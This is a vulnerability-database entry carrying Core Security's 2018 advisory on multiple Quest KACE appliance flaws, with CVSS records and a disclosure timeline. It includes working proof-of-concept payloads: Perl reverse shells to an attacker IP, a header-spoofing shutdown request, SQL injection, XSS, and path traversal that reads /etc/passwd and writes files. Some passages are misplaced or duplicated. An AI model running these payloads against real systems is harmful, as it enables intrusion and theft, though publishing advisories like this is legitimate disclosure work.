/----- $ nc -lvp 8080 Listening on [0.0.0.0] (family 0, port 8080) Connection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2, sport 20050) sh: can't access tty; job control turned off $ id uid=80(www) gid=80(www) groups=80(www) -----/
7.3. PHP Object Injection leading to arbitrary command execution
[CVE-2018-11135] An authenticated user could abuse a deserialization call on the script '/adminui/error_details.php' to inject arbitrary PHP objects.
To exploit this issue, the parameter 'ERROR_MESSAGES' needs to be an array and meet some specific conditions in order to successfully exploit the issue.
7.4. Privilege escalation via password change in Sudo Server
[CVE-2018-11134] In order to perform actions that requires higher privileges, the application relies on a message queue managed that runs with root privileges and only allows a set of commands.
One of the available commands allows to change any user's password (including root).
Assuming we are able to run commands in the server, we could abuse this feature by changing the password of the 'kace_support' account, which comes disabled by default but has full sudo privileges.
7.5. Privilege escalation via command injection in Sudo Server
[CVE-2018-11132] As mentioned in the issue [7.4], in order to perform actions that require higher privileges, the application relies on a message queue that runs daemonized with root privileges and only allows a set of commands to be executed.
A command injection vulnerability exists within this message queue which allows us to append arbitrary commands that will be run as root.
7.6. Insufficient Authorization for critical function
[CVE-2018-11142] 'systemui/settings_network.php' and 'systemui/settings_patching.php' scripts are accessible only from localhost. This restriction can be bypassed by modifying the 'Host' and 'X_Forwarded_For' HTTP headers.
The following proof of concept abuses this vulnerability to shutdown the server as an anonymous user:
/----- POST /systemui/settings_network.php HTTP/1.1 Host: localhost X-Forwarded-For: ::1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIp]/systemui/settings_network.php Content-Type: multipart/form-data; boundary=---------------------------5642543667001619951434940129 Content-Length: 3418 Connection: close Upgrade-Insecure-Requests: 1
-----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="CSRF_TOKEN" -----------------------------5642543667001619951434940129 Content-Disposition: form-data; name="$shutdown" DoIt! Content-Disposition: form-data; name="save" Save -----------------------------5642543667001619951434940129-- -----/
7.7. In particular, a blind time based type.
The following proof of concept induces a time delay:
/----- http://[ServerIP]/common/download_agent_installer.php?platform=windows&serv=58b9e89c12f57e492df8f1d744b6ed5a4d394b454ca8a99176caba35fd13ec1f&orgid=1 AND SLEEP(10)%23;&version=8.0.152 -----/
7.8. In particular, an error based type.
The following proof of concept retrieves the current database name:
/----- POST /common/run_report.php HTTP/1.1 Content-Length: 161 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Host: [ServerIP] Accept: text/html,application/xhtml xml,application/xml;q=0.9,/;q=0.8 Connection: close Referer: http://[ServerIP]/adminui/analysis_report_list.php?CATEGORY_ID= Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Cookie: [Cookie]
date=1516135247598&reportId=-3161+UNION+ALL+SELECT+CONCAT(0x7170706a71,IFNULL(CAST(DATABASE()+AS+CHAR),0x20),0x716a707171),NULL--+LhEx&reportName=&format=pdf -----/
/----- HTTP/1.1 200 OK Date: Thu, 08 Feb 2018 21:50:21 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: [ServerIP] X-KACE-Version: 8.0.318 X-KBOX-WebServer: [ServerIP] X-KBOX-Version: 8.0.318 X-KACE-WebServer: [ServerIP] X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Content-Length: 3548 Connection: close Content-Type: text/html; charset=utf-8
[...SNIPPED...]
<![endif]-->Report Queued: qppjqORG1qjpqq<meta http-equiv='refresh' [...SNIPPED...] -----/
7.9. Unauthenticated Cross Site Scriting in run_cross_report.php
[CVE-2018-11133] The 'fmt' parameter of the '/common/run_cross_report.php' script is vulnerable to cross-site scripting.
The following proof of concept demonstrates the vulnerability:
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
7.10. Path traversal in download_attachment.php leading to arbitrary file read
[CVE-2018-11137] The 'checksum' parameter of the '/common/download_attachment.php' script can be abused to read arbitrary files with 'www' privileges. The following proof of concept reads the '/etc/passwd' file. No administrator privileges are needed to execute this script.
It is worth noting that there are several interesting files that can be read with 'www' privileges, such as all the files located in '/kbox/bin/koneas/keys/' and '/kbox/kboxwww/include/globals.inc', which contain plaintext passwords.
/----- http://[ServerIP]/common/run_cross_report.php?uniqueId=366314513&id=585&org=1&fmt=xls34403')%3balert(1)%2f%2f952 -----/
The following proof of concept demonstrates the vulnerability:
/----- GET /common/download_attachment.php?checksum=/../../../../../../../../../../../etc/passwd&filename= HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK Date: Thu, 18 Jan 2018 17:18:19 GMT Server: Apache Cache-Control: must-revalidate, post-check=0, pre-check=0 Expires: -1 Pragma: public Content-Disposition: attachment; filename="" Content-Transfer-Encoding: Binary Content-Description: K1000 attachment Content-Length: 2400 Access-Control-Allow-Headers: x-kace-auth-timestamp, x-kace-auth-key, x-kace-auth-signature, accept, origin, content-type Access-Control-Allow-Origin: * Access-Control-Allow-Methods: PUT, DELETE, POST, GET, OPTIONS X-KACE-Appliance: K1000 X-KACE-Host: k10000. X-KACE-Version: 8.0.318 X-KBOX-WebServer: k10000. X-KBOX-Version: 8.0.318 X-KACE-WebServer: k10000. X-UA-Compatible: IE=9,EDGE Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform Connection: close Content-Type: application/octet-stream
$FreeBSD: releng/11.0/etc/master.passwd 299365 2016-05-10 12:47:36Z bcr $
root::0:0:Charlie &:/root:/bin/csh daemon::1:1:Owner of many system processes:/root:/usr/sbin/nologin operator::2:5:System &:/:/usr/sbin/nologin bin::3:7:Binaries Commands and Source:/:/usr/sbin/nologin tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin[...SNIPPED...] -----/
7.11. Path traversal in advisory.php leading to arbitrary file creation/deletion
[CVE-2018-11141] The 'IMAGES_JSON' and 'attachments_to_remove[]' parameters of the '/adminui/advisory.php' script can be abused to write and delete files respectively. The following proof of concept creates a file located at '/kbox/kboxwww/resources/TestWrite' with the content 'Sarasa' (base64 encoded). Files can be at any location where the 'www' user has write permissions.
File deletion could be abused to delete '/kbox/kboxwww/systemui/reports/setup_completed.log' file. This file's existence defines if the appliance setup wizard is shown or not.
The following proof of concept demonstrates the vulnerability:
/----- POST /adminui/advisory.php?ID=10 HTTP/1.1 Host: [ServerIP] Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[ServerIP]/adminui/advisory.php?ID=10 Content-Type: multipart/form-data; boundary=---------------------------2671551246366368501556269100 Content-Length: 1705 Cookie: [Cookie] Connection: close Upgrade-Insecure-Requests: 1
-----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="CSRF_TOKEN"
99c2addf067719d6fc3ae32ded351f000af8efdd091f162baa2a34516cefecc741cb13a69c80554a9ba32908d1c683102d3455eac39bcafc8854f46a04b2044e -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="IMAGES_JSON"
{"/../../../resources/TestWrite":"aaaaaa,VGVzdENvbnRlbnQ="} -----------------------------2671551246366368501556269100 Content-Disposition: form-data; name="FARRAY[ID]" [...SNIPPED...] -----/
Taking advantage of 7.2 and 7.4 we are able to verify the file creation:
/----- [root@k10000 /kbox/kboxwww/resources]# ls -lha total 32 drwxr-xr-x 2 www wheel 512B Feb 9 20:40 . drwxr-xr-x 23 root wheel 512B Nov 14 18:29 .. -rw-r--r-- 1 www wheel 11B Feb 9 20:40 TestWrite -----/
-
Report Timeline 2018-02-26: Core Security (Core) sent an initial notification to Quest Software Inc. (Quest) via web form. 2018-03-05: Quest Support confirmed the receipt and requested additional information. 2018-03-12: Core Security sent a draft advisory including a technical description. 2018-03-16: Quest Support asked for the CVE-IDs. 2018-03-16: Core Security answered saying that the CVE-IDs are required once the vendor verifies the vulnerabilities. Additionally, Core Security requested a confirmation about the reported vulnerabilities and a tentative timescale to fix them. Finally, Core Security requested that Quest use Core's advisories-publication email address as the official communication hannel also copying the researchers behind this discovery. 2018-03-16: Quest Support thanked Core's reply and stated it will be in touch during the process. 2018-03-20: Quest Support informed that they had not yet received any updates from the engineering team and had requested one. 2018-03-21: Quest Support requested information about the KACE version used for reporting the issues and also Core's company name and information. 2018-03-21: Core replied with the affected version (that was included in the original draft advisory) and a link to the Core company website and the list of previous security advisories. 2018-03-21: Quest Support acknowledged the information provided. 2018-03-26: Quest's KACE product manager (PM) thanked Core for making it aware of the security issues found and the level of thoroughness and details provided. Quest specified it had fixes already in place for some of the issues. Quest's KACE PM asked for a conference call in order to understand more about Core's offerings for future engagements. Finally, Quest's KACE PM notified the work done by Core is in breach of its license agreement, and requested Core not to distribute the findings to the public, otherwise uest would take legal action. 2018-04-13: Quest's KACE PM sent a follow up email and informed that it made a hotfix to patch the reported vulnerabilities. Quest also requested a call meeting to understand future opportunities based on the Core's company capabilities. Finally, Quest asked for information about the researcher that found the vulnerabilities and a link of Core's choosing in order to be included in Quest's Acknowledgment page (https://support.quest.com/essentials/vulnerability-reporting-acknowledgements). 2018-04-16: Core answered email from 2018-03-26 stating the company is following standard practices with regards to coordinated vulnerability disclosure, and also sent detailed technical information about our findings at Quest's request. Core also mentioned Quest seems to be well versed in the disclosure process and expects vendors to coordinate with it prior to publication via Quest's vulnerability reporting process, and that Quest's legal threat appears to be in direct contradiction to the disclosure process that they encourage on their website. Finally, Core asked about Quest's intention to work collaboratively to address these vulnerabilities and to follow industry standard disclosure processes that involves publication of the vulnerabilities. 2018-04-17: Quest's KACE PM replied saying it is willing to collaborate and is looking forward to having a conversation over the phone in order to continue the next steps in its vulnerability process (forwarded email from 2018-04-13). 2018-04-17: Core thanked the answer and stated the willingness of keeping written communications between parties in order to better document the process and communicated the next steps of the process including: 1. Testing the fix (if vendor agrees), 2. Get CVE-IDs, 3. Get a Vendor's link to be included in the advisory and finally 4. Send final advisory version to vendor and coordinate publication date together. With regards to Quest's requests, Core provided the researchers names and URL of the advisory when it will be published. Finally, Core stated that the request for other Core company services could be forwarded to the Core services team if needed (and asked the right contact at Quest) but our intention is to keep that services request separate from the coordinated disclosure process. 2018-04-18: Quest Support informed that they had publicly made available patches for its customers and unilaterally closed the case. 2018-05-31: Advisory CORE-2018-0004 published.
-
References
[1] https://www.quest.com/products/kace-systems-management-appliance/
- About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber-attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
- About Core Security
Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity amp; access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur.
Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com
- Disclaimer
The contents of this advisory are copyright (c) 2018 Core Security and (c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
- PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201805-0600",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "kace system management appliance",
"scope": "eq",
"trust": 2.2,
"vendor": "quest",
"version": "8.0.318"
},
{
"model": "kace systems management appliance",
"scope": "eq",
"trust": 0.8,
"vendor": "quest",
"version": "8.0.318"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:quest:kace_system_management_appliance:8.0.318:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2018-11140"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Core Security Technologies, Leandro Barragan, Guido Leo",
"sources": [
{
"db": "PACKETSTORM",
"id": "148005"
}
],
"trust": 0.1
},
"cve": "CVE-2018-11140",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "PARTIAL",
"baseScore": 7.5,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 10.0,
"impactScore": 6.4,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Partial",
"baseScore": 7.5,
"confidentialityImpact": "Partial",
"exploitabilityScore": null,
"id": "CVE-2018-11140",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 7.8,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "CNVD-2018-15386",
"impactScore": 6.9,
"integrityImpact": "NONE",
"severity": "HIGH",
"trust": 0.6,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 3.9,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 9.8,
"baseSeverity": "Critical",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2018-11140",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "None",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-11140",
"trust": 1.8,
"value": "CRITICAL"
},
{
"author": "CNVD",
"id": "CNVD-2018-15386",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201805-1214",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULMON",
"id": "CVE-2018-11140",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-15386"
},
{
"db": "VULMON",
"id": "CVE-2018-11140"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-005571"
},
{
"db": "NVD",
"id": "CVE-2018-11140"
},
{
"db": "CNNVD",
"id": "CNNVD-201805-1214"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The \u0027reportID\u0027 parameter received by the \u0027/common/run_report.php\u0027 script in the Quest KACE System Management Appliance 8.0.318 is not sanitized, leading to SQL injection (in particular, an error-based type). QuestKACESystemManagementAppliance is an IT asset management device from QuestSoftware, USA. A remote attacker can exploit this vulnerability to execute arbitrary SQL commands. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nQuest KACE System Management Appliance Multiple Vulnerabilities\n\n1. *Advisory Information*\n\nTitle: Quest KACE System Management Appliance Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0004\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/quest-kace-system-management-appliance-multiple-vulnerabilities\nDate published: 2018-05-31\nDate of last update: 2018-05-22\nVendors contacted: Quest Software Inc. \nRelease mode: Forced release\n\n2. *Vulnerability Information*\n\nClass: Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Improper Neutralization of Special Elements used in an OS Command\n[CWE-78], Deserialization of Untrusted Data [CWE-502], Improper Privilege\nManagement [CWE-269], Improper Privilege Management [CWE-269], Improper\nAuthorization [CWE-285], Improper Neutralization of Special Elements used\nin an SQL Command [CWE-89], Improper Neutralization of Special Elements\nused in an SQL Command [CWE-89], Improper Neutralization of Input During\nWeb Page Generation [CWE-79], External Control of File Name or Path\n[CWE-73], External Control of File Name or Path [CWE-73]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-11138, CVE-2018-11139, CVE-2018-11135, CVE-2018-11134,\nCVE-2018-11132, CVE-2018-11142, CVE-2018-11136, CVE-2018-11140,\nCVE-2018-11133,\nCVE-2018-11137, CVE-2018-11141\n\n3. *Vulnerability Description*\n\n\u003eFrom Quest KACE\u0027s website:\n\n\"The KACE Systems Management Appliance [1] provides\nyour growing organization with comprehensive management of network-connected\ndevices, including servers, PCs, Macs, Chromebooks, tablets, printers,\nstorage, networking gear and the Internet of Things (IoT). KACE can fulfill\nall of your organization\u0027s systems management needs, from initial deployment\nto ongoing management and retirement.\"\n\nMultiple vulnerabilities were found in the Quest KACE System Management\nVirtual Appliance that would allow a remote attacker to gain command\nexecution as root. We present three vectors to achieve this, including\none that can be exploited as an unauthenticated user. \n\nAdditional web application vulnerabilities were found in the web console\nthat is bundled with the product. These vulnerabilities are detailed in\nsection 7. \n\nNote: This advisory has limited details on the vulnerabilities because\nduring the attempted coordinated disclosure process, Quest advised us not\nto distribute our original findings to the public or else they would\ntake legal action. Quest\u0027s definition of \"responsible disclosure\" can be\nfound at\nhttps://support.quest.com/essentials/reporting-security-vulnerability. \n\nCoreLabs has been publishing security advisories since 1997 and believes\nin coordinated disclosure and good faith collaboration with software vendors\nbefore disclosure to help ensure that a fix or workaround solution is ready\nand available when the vulnerability details are publicized. We believe\nthat providing technical details about each finding is necessary to provide\nusers and organizations with enough information to understand the\nimplications\nof the vulnerabilities against their environment and, most importantly, to\nprioritize the remediation activities aiming at mitigating risk. \n\nWe regret Quest\u0027s posture on disclosure during the whole process (detailed\nin the Report Timeline section) and the lack of a possibility of engaging\ninto a coordinated publication date, something we achieve (and have\nachieved) with many vendors as part of our coordinated disclosure practices. \n\n4. *Vulnerable Packages*\n\n. Quest KACE System Management Appliance 8.0 (Build 8.0.318)\nOther products and versions might be affected too, but they were not tested. \n\n5. *Vendor Information, Solutions and Workarounds*\n\nQuest reports that it has released the security vulnerability patch\nSEC2018_20180410 to address the reported vulnerabilities. \nPatch can be download at\nhttps://support.quest.com/download-install-detail/6086148. \n\nFor more details, Quest published the following Security Note:\nhttps://support.quest.com/kace-systems-management-appliance/kb/254193/security-vulnerability-patch-sec2018_20180410-\n\n6. *Credits*\n\nThese vulnerabilities were discovered and researched by Leandro Barragan\nand Guido Leo from Core Security Consulting Services. The publication of\nthis advisory was coordinated by Leandro Cuozzo from Core Advisories Team. \n\n7. *Technical Description / Proof of Concept Code*\n\nQuest KACE SMA ships with a web console that provides administrators and\nusers with several features. Multiple vulnerabilities were found in the\ncontext of this console, both from an authenticated and unauthenticated\nperspective. \n\nSection 7.1 describes how an unauthenticated attacker could gain command\nexecution on the system as the web server user. \n\nVulnerabilities described in 7.2 and 7.3 could also be abused to gain code\nexecution but would require the attacker to have a valid authentication\ntoken. \n\nIn addition, issues found in the Sudo Server module presented in 7.4 and\n7.5 would allow the attacker to elevate his privileges from the web server\nuser to root, effectively obtaining full control of the device. \n\nAdditional web application vulnerabilities were found in the console, such\nas insufficient authorization for critical functions, which would allow an\nanonymous attacker to reconfigure the appliance (7.6), SQL injection\nvulnerabilities (7.7, 7,8), a cross-site scripting issue (7.9), and path\ntraversal vulnerabilities, which would allow an attacker to read, write and\ndelete arbitrary files (7.9, 7.10, 7.11). \n\n7.1. *Unauthenticated command injection*\n\n[CVE-2018-11138]\nThe \u0027/common/download_agent_installer.php\u0027 script is accessible to anonymous\nusers in order to download an agent for a specific platform. \n\nThe script receives the following parameters via the GET method:\n\n. platform: Indicates the platform in which the agent is going to be\ninstalled\n. serv: SHA256 hash of a fixed value that depends of each appliance\n. orgid: Organization ID\n. version: Version number of the agent\n\nThe last two conditions are simple to meet. The Agent versions are publicly\navailable within the Quest KACE site, but even if they were not, we found\nthat the Organization ID parameter is vulnerable to a time based SQL\ninjection\n(refer to issue 7.7). \nThis would make it possible to obtain the agent version by querying the\ntable \u0027CLIENT_DISTRIBUTION\u0027 and fetching the contents of the \u0027VERSION\u0027\ncolumn. The Organization ID is 1 by default, but could be obtained in the\nsame way as the Agent version by querying the table \u0027ORGANIZATION\u0027 and\nthe column \u0027ID\u0027. \n\nAs stated above, the application uses the Organization ID and Agent\nversion parameters to execute commands. This means we need to find a way\nto append system commands within the Organization ID, without breaking the\nSQL query. If we use the comment symbol (#), we can append anything we want\nwithout affecting the result of the query. \n\nPreparing payload:\n\n/-----\n- platform = windows\n- serv = ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\n- orgid = 1#;perl -e \u0027use\nSocket;$i=\"[AttackerIP]\";$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e\u0026S\");open(STDOUT,\"\u003e\u0026S\");open(STDERR,\"\u003e\u0026S\");exec(\"/bin/bash\n-i\");};\u0027;\n- version = 8.0.152 (last agent version available for windows)\n-----/\n\nThe following proof of concept executes a reverse shell:\n\n/-----\nGET\n/common/download_agent_installer.php?platform=windows\u0026serv=ceee78c2dc2af5587fa1e205d9a8cdfd55d7be35c7958858b5656d12550cc75c\u0026orgid=1%23%3bperl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027%3b\u0026version=8.0.152\nHTTP/1.1\nHost: Server\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nUpgrade-Insecure-Requests: 1\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.2. *Authenticated command injection*\n\n[CVE-2018-11139]\nThe \u0027/common/ajax_email_connection_test.php\u0027 script used to test the\nconfigured\nSMTP server is accessible by any authenticated user and can be abused to\nexecute arbitrary commands on the system. This script is vulnerable to\ncommand injection via the unsanitized user input \u0027TEST_SERVER\u0027 sent to the\nscript via POST method. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /common/ajax_email_connection_test.php HTTP/1.1\nHost: [ServerIP]\nAccept: application/json, text/javascript, */*; q=0.01\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 416\nCookie: [Cookie]\nConnection: close\n\nTEST_SERVER=test;perl+-e+\u0027use+Socket%3b$i%3d\"[AttackerIP]\"%3b$p%3d8080%3bsocket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"))%3bif(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"\u003e%26S\")%3bopen(STDOUT,\"\u003e%26S\")%3bopen(STDERR,\"\u003e%26S\")%3bexec(\"/bin/sh+-i\")%3b}%3b\u0027;\u0026TEST_PORT=587\u0026TEST_USERNAME=eaea@eaea.com\u0026TEST_PASSWORD=1234\u0026TEST_OLD_PASSWORD=\u0026QUEUE_ID=1\u0026TEST_TO_EMAIL=eaea@eaea.com\u0026ACTION=TEST_CONNECTION_SMTP\n-----/\n\n/-----\n$ nc -lvp 8080\nListening on [0.0.0.0] (family 0, port 8080)\nConnection from [ServerIP] port 8080 [tcp/http-alt] accepted (family 2,\nsport 20050)\nsh: can\u0027t access tty; job control turned off\n$ id\nuid=80(www) gid=80(www) groups=80(www)\n-----/\n\n7.3. *PHP Object Injection leading to arbitrary command execution*\n\n[CVE-2018-11135]\nAn authenticated user could abuse a deserialization call on the script\n\u0027/adminui/error_details.php\u0027 to inject arbitrary PHP objects. \n\nTo exploit this issue, the parameter \u0027ERROR_MESSAGES\u0027 needs to be an array\nand meet some specific conditions in order to successfully exploit the\nissue. \n\n7.4. *Privilege escalation via password change in Sudo Server*\n\n[CVE-2018-11134]\nIn order to perform actions that requires higher privileges, the application\nrelies on a message queue managed that runs with root privileges and only\nallows a set of commands. \n\nOne of the available commands allows to change any user\u0027s password\n(including root). \n\nAssuming we are able to run commands in the server, we could abuse this\nfeature by changing the password of the 